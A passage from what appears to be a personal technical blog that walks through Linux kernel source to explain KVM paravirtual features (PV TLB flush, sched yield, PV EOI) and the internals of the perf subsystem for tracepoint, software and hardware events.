(1 << KVM_FEATURE_PV_UNHALT) |
(1 << KVM_FEATURE_PV_TLB_FLUSH) |
(1 << KVM_FEATURE_ASYNC_PF_VMEXIT) |
</code></pre></div></div>
<p>PV tlb shootdown resues the preepted field in ‘kvm_steal_time’ to expose the vcpu running/preempted information to the guest. When the vcpu is running from preempted. If it finds the flush flag. It will do the flush.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> record_steam_time()
{
if (xchg(&st->preempted, 0) & KVM_VCPU_FLUSH_TLB)
kvm_vcpu_flush_tlb_guest(vcpu);
}
</code></pre></div></div>
<p>When the vcpu is preempted, ‘KVM_VCPU_PREEMPTED’ will be assigned to ‘st.preempted’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_steal_time_set_preempted(struct kvm_vcpu *vcpu)
{
st->preempted = vcpu->arch.st.preempted = KVM_VCPU_PREEMPTED;
}
</code></pre></div></div>
<h4> guest side </h4>
<p>When the guest startup, it will check whether the guest supports ‘KVM_FEATURE_PV_TLB_FLUSH’ feature. If it does the ‘kvm_flush_tlb_others’ will be replaced.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (pv_tlb_flush_supported()) {
pv_ops.mmu.flush_tlb_others = kvm_flush_tlb_others;
pv_ops.mmu.tlb_remove_table = tlb_remove_table;
pr_info("KVM setup pv remote TLB flush\n");
}
static bool pv_tlb_flush_supported(void)
{
return (kvm_para_has_feature(KVM_FEATURE_PV_TLB_FLUSH) &&
!kvm_para_has_hint(KVM_HINTS_REALTIME) &&
kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
}
</code></pre></div></div>
<h4> guest TLB flush </h4>
<p>When the guest does pv shootdown, ‘kvm_flush_tlb_others’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_flush_tlb_others(const struct cpumask *cpumask,
const struct flush_tlb_info *info)
{
u8 state;
int cpu;
struct kvm_steal_time *src;
struct cpumask *flushmask = this_cpu_cpumask_var_ptr(__pv_cpu_mask);
cpumask_copy(flushmask, cpumask);
/*
* We have to call flush only on online vCPUs. And
* queue flush_on_enter for pre-empted vCPUs
*/
for_each_cpu(cpu, flushmask) {
src = &per_cpu(steal_time, cpu);
state = READ_ONCE(src->preempted);
if ((state & KVM_VCPU_PREEMPTED)) {
if (try_cmpxchg(&src->preempted, &state,
state | KVM_VCPU_FLUSH_TLB))
__cpumask_clear_cpu(cpu, flushmask);
}
}
native_flush_tlb_others(flushmask, info);
}
</code></pre></div></div>
<p>Here we can see it will try to read the ‘src->preempted’ it has ‘KVM_VCPU_PREEMPTED’ bit set, the ‘KVM_VCPU_FLUSH_TLB’ will be set in the ‘src->preempted’. Thus when the vcpu is sched in it will does the tlb flush.</p>
<h3> PV sched yield </h3>
<p>This feature also from Wanpeng Li, he says in the patch this idea is from Xen.
When sending a call-function IPI-many to vCPU, yield(by hypercall) if any of the IPI targhet vCPU was preempted.</p>
<h4> kvm side </h4>
<p>First we need to export this feature to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
...
(1 << KVM_FEATURE_PV_SCHED_YIELD) |
</code></pre></div></div>
<p>Then we need to implement the hypercall handler to process the yield hypercall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int kvm_emulate_hypercall(struct kvm_vcpu *vcpu)
{
case KVM_HC_SCHED_YIELD:
kvm_sched_yield(vcpu->kvm, a0);
ret = 0;
break;
}
static void kvm_sched_yield(struct kvm *kvm, unsigned long dest_id)
{
struct kvm_vcpu *target = NULL;
struct kvm_apic_map *map;
rcu_read_lock();
map = rcu_dereference(kvm->arch.apic_map);
if (likely(map) && dest_id <= map->max_apic_id && map->phys_map[dest_id])
target = map->phys_map[dest_id]->vcpu;
rcu_read_unlock();
if (target && READ_ONCE(target->ready))
kvm_vcpu_yield_to(target);
}
</code></pre></div></div>
<p>Find the target vcpu and yield to it.</p>
<h4> guest side </h4>
<p>When the guest startup it will replace the ‘smp_ops.send_call_func_ipi’ with ‘kvm_smp_send_call_func_ipi’ if the PV sched yield feature supported.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __init kvm_guest_init(void)
{
if (pv_sched_yield_supported()) {
smp_ops.send_call_func_ipi = kvm_smp_send_call_func_ipi;
pr_info("KVM setup pv sched yield\n");
}
}
static bool pv_sched_yield_supported(void)
{
return (kvm_para_has_feature(KVM_FEATURE_PV_SCHED_YIELD) &&
!kvm_para_has_hint(KVM_HINTS_REALTIME) &&
kvm_para_has_feature(KVM_FEATURE_STEAL_TIME));
}
</code></pre></div></div>
<h4> guest trigger call-function IPI-many </h4>
<p>When the guest send call func IPI, first the current vcpu will call ‘native_send_call_func_ipi’ to send IPI to the target vcpu. If the target vCPU is preempted, it will issue a hypercall ‘
KVM_HC_SCHED_YIELD’. Notice we just do this for the first vcpu as the target vcpu’s state can be changed underneath.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_smp_send_call_func_ipi(const struct cpumask *mask)
{
int cpu;
native_send_call_func_ipi(mask);
/* Make sure other vCPUs get a chance to run if they need to. */
for_each_cpu(cpu, mask) {
if (vcpu_is_preempted(cpu)) {
kvm_hypercall1(KVM_HC_SCHED_YIELD, per_cpu(x86_cpu_to_apicid, cpu));
break;
}
}
}
</code></pre></div></div>
<h3> PV EOI </h3>
<p>PV EOI is another (old) pv optimization. The idea behind pv eoi is to avoid the EOI write in APIC. This exit is expensive.
PV EOI uses a shared memory just like many of the optimization above. The VMM set a flag in this shared memory before injecting the interrupt, when the guest process the interrupt and write an EOI, if it finds this flag it will clear it and just return.</p>
<h4> kvm side </h4>
<p>First of all the kvm should expose this feature to the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case KVM_CPUID_FEATURES:
entry->eax = (1 << KVM_FEATURE_CLOCKSOURCE) |
...
(1 << KVM_FEATURE_PV_EOI) |
</code></pre></div></div>
<p>The guest will write write the ‘MSR_KVM_PV_EOI_EN’ to set the gpa of the shared memroy and set the enable bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> case MSR_KVM_PV_EOI_EN:
if (kvm_lapic_enable_pv_eoi(vcpu, data, sizeof(u8)))
return 1;
int kvm_lapic_enable_pv_eoi(struct kvm_vcpu *vcpu, u64 data, unsigned long len)
{
u64 addr = data & ~KVM_MSR_ENABLED;
struct gfn_to_hva_cache *ghc = &vcpu->arch.pv_eoi.data;
unsigned long new_len;
if (!IS_ALIGNED(addr, 4))
return 1;
vcpu->arch.pv_eoi.msr_val = data;
if (!pv_eoi_enabled(vcpu))
return 0;
if (addr == ghc->gpa && len <= ghc->len)
new_len = ghc->len;
else
new_len = len;
return kvm_gfn_to_hva_cache_init(vcpu->kvm, ghc, addr, new_len);
}
</code></pre></div></div>
<p>The ‘apic_sync_pv_eoi_to_guest’ will be called when vmentry.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_sync_pv_eoi_to_guest(struct kvm_vcpu *vcpu,
struct kvm_lapic *apic)
{
if (!pv_eoi_enabled(vcpu) ||
/* IRR set or many bits in ISR: could be nested. */
apic->irr_pending ||
/* Cache not set: could be safe but we don't bother. */
apic->highest_isr_cache == -1 ||
/* Need EOI to update ioapic. */
kvm_ioapic_handles_vector(apic, apic->highest_isr_cache)) {
/*
* PV EOI was disabled by apic_sync_pv_eoi_from_guest
* so we need not do anything here.
*/
return;
}
pv_eoi_set_pending(apic->vcpu);
}
</code></pre></div></div>
<p>‘pv_eoi_set_pending’ will set the ‘KVM_PV_EOI_ENABLED’ flag in shared memory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void pv_eoi_set_pending(struct kvm_vcpu *vcpu)
{
if (pv_eoi_put_user(vcpu, KVM_PV_EOI_ENABLED) < 0) {
printk(KERN_WARNING "Can't set EOI MSR value: 0x%llx\n",
(unsigned long long)vcpu->arch.pv_eoi.msr_val);
return;
}
__set_bit(KVM_APIC_PV_EOI_PENDING, &vcpu->arch.apic_attention);
}
</code></pre></div></div>
<p>The ‘apic_sync_pv_eoi_from_guest’ will be called when vmexit or cancel interrupt.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void apic_sync_pv_eoi_from_guest(struct kvm_vcpu *vcpu,
struct kvm_lapic *apic)
{
bool pending;
int vector;
/*
* PV EOI state is derived from KVM_APIC_PV_EOI_PENDING in host
* and KVM_PV_EOI_ENABLED in guest memory as follows:
*
* KVM_APIC_PV_EOI_PENDING is unset:
* -> host disabled PV EOI.
* KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is set:
* -> host enabled PV EOI, guest did not execute EOI yet.
* KVM_APIC_PV_EOI_PENDING is set, KVM_PV_EOI_ENABLED is unset:
* -> host enabled PV EOI, guest executed EOI.
*/
BUG_ON(!pv_eoi_enabled(vcpu));
pending = pv_eoi_get_pending(vcpu);
/*
* Clear pending bit in any case: it will be set again on vmentry.
* While this might not be ideal from performance point of view,
* this makes sure pv eoi is only enabled when we know it's safe.
*/
pv_eoi_clr_pending(vcpu);
if (pending)
return;
vector = apic_set_eoi(apic);
trace_kvm_pv_eoi(apic, vector);
}
</code></pre></div></div>
<p>‘pv_eoi_get_pending’ will get the status of the shared flag. If it is still pending, it means the no guest trigger the EOI write, nothing to do. If the guest trigger the EOI here will call ‘apic_set_eoi’ set the EOI of APIC.
Note the ‘apic->irr_pending’ will always be true with virtual interrupt delivery enabled. So pv eoi today I think is little used as the APICv is very common.</p>
<h4> guest side </h4>
<p>When the guest startup, it will write the ‘MSR_KVM_PV_EOI_EN’ with the ‘kvm_apic_eoi’ address and ‘KVM_MSR_ENABLED’ bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void kvm_guest_cpu_init(void)
{
...
if (kvm_para_has_feature(KVM_FEATURE_PV_EOI)) {
unsigned long pa;
/* Size alignment is implied but just to make it explicit. */
BUILD_BUG_ON(__alignof__(kvm_apic_eoi) < 4);
__this_cpu_write(kvm_apic_eoi, 0);
pa = slow_virt_to_phys(this_cpu_ptr(&kvm_apic_eoi))
| KVM_MSR_ENABLED;
wrmsrl(MSR_KVM_PV_EOI_EN, pa);
}
...
}
</code></pre></div></div>
<p>Also it will set the ‘eoi_write’ callback with ‘kvm_guest_apic_eoi_write’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void kvm_guest_init(void)
{
if (kvm_para_has_feature(KVM_FEATURE_PV_EOI))
apic_set_eoi_write(kvm_guest_apic_eoi_write);
}
void __init apic_set_eoi_write(void (*eoi_write)(u32 reg, u32 v))
{
struct apic **drv;
for (drv = __apicdrivers; drv < __apicdrivers_end; drv++) {
/* Should happen once for each apic */
WARN_ON((*drv)->eoi_write == eoi_write);
(*drv)->native_eoi_write = (*drv)->eoi_write;
(*drv)->eoi_write = eoi_write;
}
}
</code></pre></div></div>
<h4> guest trigger EOI </h4>
<p>When the guest write EOI,’kvm_guest_apic_eoi_write’ will be called.
It first check whether ‘KVM_PV_EOI_BIT’ is set. If it is, it will clear it and return. Avoid the VM-exit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static notrace void kvm_guest_apic_eoi_write(u32 reg, u32 val)
{
/**
* This relies on __test_and_clear_bit to modify the memory
* in a way that is atomic with respect to the local CPU.
* The hypervisor only accesses this memory from the local CPU so
* there's no need for lock or memory barriers.
* An optimization barrier is implied in apic write.
*/
if (__test_and_clear_bit(KVM_PV_EOI_BIT, this_cpu_ptr(&kvm_apic_eoi)))
return;
apic->native_eoi_write(APIC_EOI, APIC_EOI_ACK);
}
</code></pre></div></div>
Linux kernel perf architecture2020-08-29T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/29/perf-arch
<h3> Component overview </h3>
<p>Linux perf subsystem is very useful in performance profiling. Following shows the perf subsystem componenet, from this <a href="https://leezhenghui.github.io/linux/2019/03/05/exploring-usdt-on-linux.html">post</a>.</p>
<p><img src="/assets/img/perf/1.png" alt="" /></p>
<p>‘perf’ is the user program that can be used to do performance profiling.</p>
<p>There only exposed to userspace syscall perf_event_open returns an perf event fd. This syscall has no glibc wrapper. More info can be read in <a href="https://www.man7.org/linux/man-pages/man2/perf_event_open.2.html">man page</a>. This function is one of the most complicated function.</p>
<p>‘perf_event’ is the core struct in kernel. There are several types of perf event, such as tracepoint, software, hardware.</p>
<p>We can also attach eBPF program to trae event through perf event fd.</p>
<h3> Abstract layer </h3>
<p>Following shows the abstract layer of perf.</p>
<p><img src="/assets/img/perf/2.png" alt="" /></p>
<p>Every type perf event has a corresponding PMU(performance monitor unit). For example the tracepoint pmu has following pmu.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<p>The hardware related PMU has the arch-spec related abstract structure like the ‘struct x86_pmu’. The hardware related structure will read/write the performance monitor MSR.</p>
<p>Every PMU is registerd by calling ‘perf_pmu_register’.</p>
<h3> Perf event context </h3>
<p>The perf can monitor cpu-related and task-related events. And both of them can have several monitored events. So we need a context to connects the events. This is ‘perf_event_context’.</p>
<p>There are two kinds of context, software and hardware, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum perf_event_task_context {
perf_invalid_context = -1,
perf_hw_context = 0,
perf_sw_context,
perf_nr_task_contexts,
};
</code></pre></div></div>
<p>For CPU level, the context is defined as ‘perf_cpu_context’ and is defined as percpu variable in ‘struct pmu’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct pmu {
...
struct perf_cpu_context __percpu *pmu_cpu_context;
};
</code></pre></div></div>
<p>If the PMU is the same type, they will share one ‘struct perf_cpu_context’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_pmu_register(struct pmu *pmu, const char *name, int type)
{
int cpu, ret, max = PERF_TYPE_MAX;
mutex_lock(&pmus_lock);
...
pmu->pmu_cpu_context = find_pmu_context(pmu->task_ctx_nr);
if (pmu->pmu_cpu_context)
goto got_cpu_context;
ret = -ENOMEM;
pmu->pmu_cpu_context = alloc_percpu(struct perf_cpu_context);
if (!pmu->pmu_cpu_context)
goto free_dev;
for_each_possible_cpu(cpu) {
struct perf_cpu_context *cpuctx;
cpuctx = per_cpu_ptr(pmu->pmu_cpu_context, cpu);
__perf_event_init_context(&cpuctx->ctx);
lockdep_set_class(&cpuctx->ctx.mutex, &cpuctx_mutex);
lockdep_set_class(&cpuctx->ctx.lock, &cpuctx_lock);
cpuctx->ctx.pmu = pmu;
cpuctx->online = cpumask_test_cpu(cpu, perf_online_mask);
__perf_mux_hrtimer_init(cpuctx, cpu);
cpuctx->heap_size = ARRAY_SIZE(cpuctx->heap_default);
cpuctx->heap = cpuctx->heap_default;
}
...
}
</code></pre></div></div>
<p>Following pic shows the related structure, from this <a href="https://blog.csdn.net/pwl999/article/details/81200439">post</a>.</p>
<p><img src="/assets/img/perf/3.png" alt="" /></p>
<p>For task level, the ‘task_struct’ has a pointer array defined as this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct task_struct {
struct perf_event_context *perf_event_ctxp[perf_nr_task_contexts];
};
</code></pre></div></div>
<p>Following pic shows the related structure, also from this <a href="https://blog.csdn.net/pwl999/article/details/81200439">post</a>.</p>
<p><img src="/assets/img/perf/4.png" alt="" /></p>
<p>The CPU level perf event will be triggered while the cpu is online. But for task level perf event, it will be only trigged by running the task.
The ‘perf_cpu_context’s task_ctx contains the current running task’s perf context.</p>
<h3> Perf event context schedule </h3>
<p>One of the perf’s work is to schedule in and out the perf_event_context of the task.</p>
<p>Following pic shows the task schedule in and out function related with perf.</p>
<p><img src="/assets/img/perf/5.png" alt="" /></p>
<p>Finally the PMU’s add and del callback will be called. Let’s use tracepoint as an example. The add callback is ‘perf_trace_add’ and the del callback is ‘perf_trace_add’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int perf_trace_add(struct perf_event *p_event, int flags)
{
struct trace_event_call *tp_event = p_event->tp_event;
if (!(flags & PERF_EF_START))
p_event->hw.state = PERF_HES_STOPPED;
/*
* If TRACE_REG_PERF_ADD returns false; no custom action was performed
* and we need to take the default action of enqueueing our event on
* the right per-cpu hlist.
*/
if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_ADD, p_event)) {
struct hlist_head __percpu *pcpu_list;
struct hlist_head *list;
pcpu_list = tp_event->perf_events;
if (WARN_ON_ONCE(!pcpu_list))
return -EINVAL;
list = this_cpu_ptr(pcpu_list);
hlist_add_head_rcu(&p_event->hlist_entry, list);
}
return 0;
}
void perf_trace_del(struct perf_event *p_event, int flags)
{
struct trace_event_call *tp_event = p_event->tp_event;
/*
* If TRACE_REG_PERF_DEL returns false; no custom action was performed
* and we need to take the default action of dequeueing our event from
* the right per-cpu hlist.
*/
if (!tp_event->class->reg(tp_event, TRACE_REG_PERF_DEL, p_event))
hlist_del_rcu(&p_event->hlist_entry);
}
</code></pre></div></div>
<p>The ‘perf_event’ will be added or removed to the ‘tp_event->perf_events’ lists.</p>
<h3> perf_event_open flow </h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> perf_event_open
->perf_copy_attr
->get_unused_fd_flags(fd)
->perf_event_alloc
->perf_init_event
->perf_try_init_event
->pmu->event_init()
->find_get_context
->perf_install_in_context
->__perf_install_in_context
->add_event_to_ctx
->list_add_event
->perf_group_attach
->add_event_to_ctx
->fd_install
</code></pre></div></div>
<p>perf_event_open will call ‘pmu->event_init’ to initialize the event. And add the perf_event to a perf_event_context.</p>
<h3> tracepoint event in perf </h3>
<p>Recall the definition of tracepoint PMU.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_tracepoint = {
.task_ctx_nr = perf_sw_context,
.event_init = perf_tp_event_init,
.add = perf_trace_add,
.del = perf_trace_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<p>Let’s try to figure how the perf subsystem monitor tracepoint event.</p>
<h4> perf event initialization </h4>
<p>‘perf_tp_event_init’ is called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>perf_tp_event_init
->perf_trace_init
->perf_trace_event_init
->perf_trace_event_reg
->tp_event->class->reg(TRACE_REG_PERF_REGISTER)
</code></pre></div></div>
<p>‘perf_trace_init’ will find the specified tracepoint.</p>
<p>‘perf_trace_event_reg’ will allocate and initliaze ‘tp_event_perf_events’ list. and call the ‘tp_event->class->reg’ with TRACE_REG_PERF_REGISTER.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int perf_trace_event_reg(struct trace_event_call *tp_event,
struct perf_event *p_event)
{
struct hlist_head __percpu *list;
int ret = -ENOMEM;
int cpu;
p_event->tp_event = tp_event;
if (tp_event->perf_refcount++ > 0)
return 0;
list = alloc_percpu(struct hlist_head);
if (!list)
goto fail;
for_each_possible_cpu(cpu)
INIT_HLIST_HEAD(per_cpu_ptr(list, cpu));
tp_event->perf_events = list;
...
ret = tp_event->class->reg(tp_event, TRACE_REG_PERF_REGISTER, NULL);
if (ret)
goto fail;
total_ref_count++;
return 0;
...
}
</code></pre></div></div>
<p>The ‘tp_event->class->reg’ callback is ‘trace_event_reg’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
...
#ifdef CONFIG_PERF_EVENTS
case TRACE_REG_PERF_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->perf_probe,
call);
case TRACE_REG_PERF_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->perf_probe,
call);
return 0;
case TRACE_REG_PERF_OPEN:
case TRACE_REG_PERF_CLOSE:
case TRACE_REG_PERF_ADD:
case TRACE_REG_PERF_DEL:
return 0;
#endif
}
return 0;
}
</code></pre></div></div>
<p>We can see the ‘call->class->perf_probe’ will be register to the tracepoint. From my <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/09/ebpf-with-tracepoint">post</a>. We know that this ‘perf_probe’ is ‘perf_trace_##call’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static notrace void \
perf_trace_##call(void *__data, proto) \
{ \
struct trace_event_call *event_call = __data; \
struct trace_event_data_offsets_##call __maybe_unused __data_offsets;\
struct trace_event_raw_##call *entry; \
struct pt_regs *__regs; \
u64 __count = 1; \
struct task_struct *__task = NULL; \
struct hlist_head *head; \
int __entry_size; \
int __data_size; \
int rctx; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
head = this_cpu_ptr(event_call->perf_events); \
if (!bpf_prog_array_valid(event_call) && \
__builtin_constant_p(!__task) && !__task && \
hlist_empty(head)) \
return; \
\
__entry_size = ALIGN(__data_size + sizeof(*entry) + sizeof(u32),\
sizeof(u64)); \
__entry_size -= sizeof(u32); \
\
entry = perf_trace_buf_alloc(__entry_size, &__regs, &rctx); \
if (!entry) \
return; \
\
perf_fetch_caller_regs(__regs); \
\
tstruct \
\
{ assign; } \
\
perf_trace_run_bpf_submit(entry, __entry_size, rctx, \
event_call, __count, __regs, \
head, __task); \
}
</code></pre></div></div>
<p>If the ‘event_call->perf_events’ is empty, it indicates there is no perf_event current added to this tracepoint.
This is the default status when ‘perf_event_open’ initialize a perf_event.</p>
<h4> perf event add </h4>
<p>When the task is scheded in CPU, the ‘pmu->add’ will be called and it will link the ‘perf_event’ to the ‘event_call->perf_events’ linked lists.</p>
<h4> perf event del </h4>
<p>When the task is scheded out from CPU, the ‘pmu->del’ will be called and it will remove the ‘perf_event’ from the ‘event_call->perf_events’ linked lists.</p>
<h4> perf event trigger </h4>
<p>If the ‘event_call->perf_events’ is not empty, the ‘perf_trace_run_bpf_submit’ will ba called. If no eBPF program attached, the ‘perf_tp_event’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void perf_tp_event(u16 event_type, u64 count, void *record, int entry_size,
struct pt_regs *regs, struct hlist_head *head, int rctx,
struct task_struct *task)
{
struct perf_sample_data data;
struct perf_event *event;
struct perf_raw_record raw = {
.frag = {
.size = entry_size,
.data = record,
},
};
perf_sample_data_init(&data, 0, 0);
data.raw = &raw;
perf_trace_buf_update(record, event_type);
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_tp_event_match(event, &data, regs))
perf_swevent_event(event, count, &data, regs);
}
...
perf_swevent_put_recursion_context(rctx);
}
</code></pre></div></div>
<p>For every ‘perf_event’ in ‘event_call->perf_events’ list. It call perf_swevent_event to trigger a perf event.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void perf_swevent_event(struct perf_event *event, u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct hw_perf_event *hwc = &event->hw;
local64_add(nr, &event->count);
if (!regs)
return;
if (!is_sampling_event(event))
return;
if ((event->attr.sample_type & PERF_SAMPLE_PERIOD) && !event->attr.freq) {
data->period = nr;
return perf_swevent_overflow(event, 1, data, regs);
} else
data->period = event->hw.last_period;
if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
return perf_swevent_overflow(event, 1, data, regs);
if (local64_add_negative(nr, &hwc->period_left))
return;
perf_swevent_overflow(event, 0, data, regs);
}
</code></pre></div></div>
<p>‘perf_swevent_event’ add the ‘event->count’. If the event is not sampling it just returns. Tis is the perf count mode.
If the perf_event is in sample mode, it needs to copy the tracepoint data. Following is the callchain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> perf_swevent_overflow->__perf_event_overflow->event->overflow_handler(perf_event_output).
</code></pre></div></div>
<h3> software perf event </h3>
<p>Software PMU is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu perf_swevent = {
.task_ctx_nr = perf_sw_context,
.capabilities = PERF_PMU_CAP_NO_NMI,
.event_init = perf_swevent_init,
.add = perf_swevent_add,
.del = perf_swevent_del,
.start = perf_swevent_start,
.stop = perf_swevent_stop,
.read = perf_swevent_read,
};
</code></pre></div></div>
<h4> perf event initialization</h4>
<p>‘perf_swevent_init’ will be called. It call ‘swevent_hlist_get’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int perf_swevent_init(struct perf_event *event)
{
u64 event_id = event->attr.config;
if (event->attr.type != PERF_TYPE_SOFTWARE)
return -ENOENT;
/*
* no branch sampling for software events
*/
if (has_branch_stack(event))
return -EOPNOTSUPP;
switch (event_id) {
case PERF_COUNT_SW_CPU_CLOCK:
case PERF_COUNT_SW_TASK_CLOCK:
return -ENOENT;
default:
break;
}
if (event_id >= PERF_COUNT_SW_MAX)
return -ENOENT;
if (!event->parent) {
int err;
err = swevent_hlist_get();
if (err)
return err;
static_key_slow_inc(&perf_swevent_enabled[event_id]);
event->destroy = sw_perf_event_destroy;
}
return 0;
}
</code></pre></div></div>
<p>This creates a percpu ‘swhash->swevent_hlist’ lists. Also set perf_swevent_enabled[event_id] to true.</p>
<h4> perf event add </h4>
<p>‘perf_swevent_add’ adds the perf_event to the percpu hash lists.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int perf_swevent_add(struct perf_event *event, int flags)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct hw_perf_event *hwc = &event->hw;
struct hlist_head *head;
if (is_sampling_event(event)) {
hwc->last_period = hwc->sample_period;
perf_swevent_set_period(event);
}
hwc->state = !(flags & PERF_EF_START);
head = find_swevent_head(swhash, event);
if (WARN_ON_ONCE(!head))
return -EINVAL;
hlist_add_head_rcu(&event->hlist_entry, head);
perf_event_update_userpage(event);
return 0;
}
</code></pre></div></div>
<h4> perf event del </h4>
<p>‘perf_swevent_del’ remove from the hash lists.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void perf_swevent_del(struct perf_event *event, int flags)
{
hlist_del_rcu(&event->hlist_entry);
}
</code></pre></div></div>
<h4> perf event trigger </h4>
<p>Take the task switch as an example.</p>
<p>The ‘perf_sw_event_sched’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void perf_event_task_sched_out(struct task_struct *prev,
struct task_struct *next)
{
perf_sw_event_sched(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, 0);
if (static_branch_unlikely(&perf_sched_events))
__perf_event_task_sched_out(prev, next);
}
</code></pre></div></div>
<p>After <strong>perf_event_task_sched_out-></strong>_perf_sw_event->do_perf_sw_event callchain.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
u64 nr,
struct perf_sample_data *data,
struct pt_regs *regs)
{
struct swevent_htable *swhash = this_cpu_ptr(&swevent_htable);
struct perf_event *event;
struct hlist_head *head;
rcu_read_lock();
head = find_swevent_head_rcu(swhash, type, event_id);
if (!head)
goto end;
hlist_for_each_entry_rcu(event, head, hlist_entry) {
if (perf_swevent_match(event, type, event_id, data, regs))
perf_swevent_event(event, nr, data, regs);
}
end:
rcu_read_unlock();
}
</code></pre></div></div>
<p>As we can see it finally calls ‘perf_swevent_event’ to trigger a event.</p>
<h3> hardware perf event </h3>
<p>One of the hardware PMU is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct pmu pmu = {
.pmu_enable = x86_pmu_enable,
.pmu_disable = x86_pmu_disable,
.attr_groups = x86_pmu_attr_groups,
.event_init = x86_pmu_event_init,
.event_mapped = x86_pmu_event_mapped,
.event_unmapped = x86_pmu_event_unmapped,
.add = x86_pmu_add,
.del = x86_pmu_del,
.start = x86_pmu_start,
.stop = x86_pmu_stop,
.read = x86_pmu_read,
.start_txn = x86_pmu_start_txn,
.cancel_txn = x86_pmu_cancel_txn,
.commit_txn = x86_pmu_commit_txn,
.event_idx = x86_pmu_event_idx,
.sched_task = x86_pmu_sched_task,
.task_ctx_size = sizeof(struct x86_perf_task_context),
.swap_task_ctx = x86_pmu_swap_task_ctx,
.check_period = x86_pmu_check_period,
.aux_output_match = x86_pmu_aux_output_match,
};
</code></pre></div></div>
<p>The hardware perf event is quite complicated as it will interact with the hardware. Here will not go deep in the hardware.</p>
<h4> perf event init </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> x86_pmu_event_init
->__x86_pmu_event_init
->x86_reserve_hardware
->x86_pmu.hw_config()
->validate_event
</code></pre></div></div>
<p>The ‘x86_pmu’ here is a arch-spec PMU structure.</p>
<h4> perf event add </h4>
<p>x86_pmu_add
->collect_events
->
->x86_pmu.schedule_events()
->x86_pmu.add</p>
<p>‘collect_events’ sets</p>
